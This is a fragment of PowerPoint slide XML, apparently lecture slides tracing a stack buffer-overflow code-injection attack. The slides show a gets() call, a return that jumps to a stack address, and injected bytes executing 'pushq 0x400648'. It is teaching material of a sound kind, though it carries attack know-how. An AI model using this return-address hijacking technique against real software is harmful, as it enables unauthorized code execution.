                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{612B89F9-8637-B34C-B1C8-2788E17E3A11}"/>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5" name="Rectangle 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698DF609-3A75-E149-90C4-CF9FDFDB98D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6" name="Rectangle 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9EAB29D-A9C5-764B-ADED-A4D3E53108E1}"/>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7" name="Rectangle 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B344E5-DE3A-3346-895E-B729214A3413}"/>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8" name="Rectangle 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6468A93C-84DE-724D-A0A1-93BB5FDAD67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09" name="Rectangle 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1236B5-74E9-AF42-8E61-77EE1778B488}"/>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110" name="Rectangle 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9446E804-B359-2843-B217-A8F1CD438CDC}"/>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94" name="Group 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32264CEE-70E5-D84C-BF5E-B23B8D0F9CAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="95" name="Rectangle 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF20F41-91BA-2947-B56D-6A46B5D16FA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96" name="Rectangle 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00707807-029E-1142-83EA-90D2E46371BF}"/>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97" name="Rectangle 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3EB180-E80B-7B4A-BF13-DBFB2CBF314E}"/>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7F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Rectangle 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82CEC1EE-62F7-354E-B505-1A4F6E6F2485}"/>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99" name="Rectangle 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46D6564-D665-BD4D-8D5D-5B476B82D75E}"/>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100" name="Rectangle 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F613D0-1B37-FD48-88C5-4689C242C71C}"/>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FF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rectangle 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CD540F-DD0E-9146-B874-B578A53BE7C0}"/>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DF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="Rectangle 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9380E695-41BD-914F-96AC-648FACEAC857}"/>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F8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="89" name="Group 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EEFC9E-9143-5248-A4BC-BEC7BA201093}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Rectangle 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7A395C-BBCA-1648-BE89-CCC92A9C1BE6}"/>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1" name="Rectangle 130">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24D05F5F-7385-8147-935F-3612650E6ADE}"/>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2" name="Rectangle 131">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FD7CB3-B9FD-1B4C-9B97-7E05E893B5FD}"/>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3" name="Rectangle 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A7FE4F-59E6-9442-A7A3-47BEC15AB0FD}"/>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4" name="Rectangle 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDE98C05-E5A8-074D-B3B7-7B292C407FBC}"/>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5" name="Rectangle 134">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60D080A-927B-A447-8C74-66EFC59D2449}"/>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6" name="Rectangle 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBD4F5B-C78C-6744-B443-4127AE363184}"/>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37" name="Rectangle 136">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73D42B1-089C-D040-AE86-A70AE3AF6FCB}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946CCFC5-5889-294C-81E2-B14AA102C93C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901543" y="4341806"/>
            <a:ext cx="4221027" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400626</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="TextBox 186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FE1A5B-8C3D-8847-B885-837ADCB6B09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341805"/>
            <a:ext cx="3802644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x40062B</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="TextBox 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7D2DA9-A1B2-2349-9B90-FCAFA68BA477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341744"/>
            <a:ext cx="3244799" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400635</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="195" name="Group 194">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{803DBFC0-D948-4D47-A86A-7DC86B854A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="3760081"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="196" name="TextBox 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C1A1513-7CD9-2747-94F6-8ECC89904FD7}"/>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0x7FFFFFFFE008</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="197" name="Straight Arrow Connector 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6735059C-A8A6-7E4F-B1C9-3F1A67AFB6DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="196"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66895C5B-50A2-D144-B2DB-AE81C163C22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4339473"/>
            <a:ext cx="1792478" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400639</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="TextBox 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BC52E4-0D89-AA42-86F6-6367F9E15DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4346052"/>
            <a:ext cx="2826415" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x7FFFFFFFDFF8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x400648</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="204" name="Group 203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF69835-F3E2-7D41-B530-EBA1C8B60B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="2977777"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205" name="TextBox 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CD4C8B-C3F9-9A45-A2D8-E09C00CCF6F3}"/>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0x7FFFFFFFE010</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="206" name="Straight Arrow Connector 205">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68CAC67-9A65-5844-A3E0-6D218821FDE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="205"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7" name="Straight Arrow Connector 206">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E575F19-AC1B-A54F-9067-A7360B4D84B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="200" idx="1"/>
            <a:endCxn id="128" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5530439" y="4669218"/>
            <a:ext cx="1369176" cy="107788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08" name="Group 207">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8318FE3B-BFE3-3747-8B6A-AAC0CC192E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="702453" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="209" name="Group 208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4051D3-B2A6-3640-BBA2-1CA06C660A8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="246" name="Rectangle 245">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9572107E-2DB5-C244-BC2D-74EBB9F0FEFD}"/>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47" name="Rectangle 246">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E671857C-1AD3-A242-AE50-845C847CE080}"/>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48" name="Rectangle 247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589A581D-0515-C04A-A22E-3DD8112E5588}"/>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C3</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>???</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="249" name="Rectangle 248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A86B300-E55C-B441-8D9C-C79A2E33792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00</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>NUL</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="250" name="Rectangle 249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3987421-E5A3-5D4A-940E-3EFBD01BF343}"/>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40</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'@'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="251" name="Rectangle 250">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24332584-F762-4E42-A5CF-B66465D00882}"/>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06</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>ACK</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="252" name="Rectangle 251">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869A5DCE-0E50-C141-B138-73C0038FEBAA}"/>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48</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'H'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Rectangle 252">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F139CC82-9E95-C040-825D-DC7EDCAC2A68}"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="210" name="Group 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAAF66D5-2633-3842-8D52-65C9A8A73D70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="238" name="Rectangle 237">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6906FF95-A19A-0B40-AF2A-873351CA61C7}"/>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39" name="Rectangle 238">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
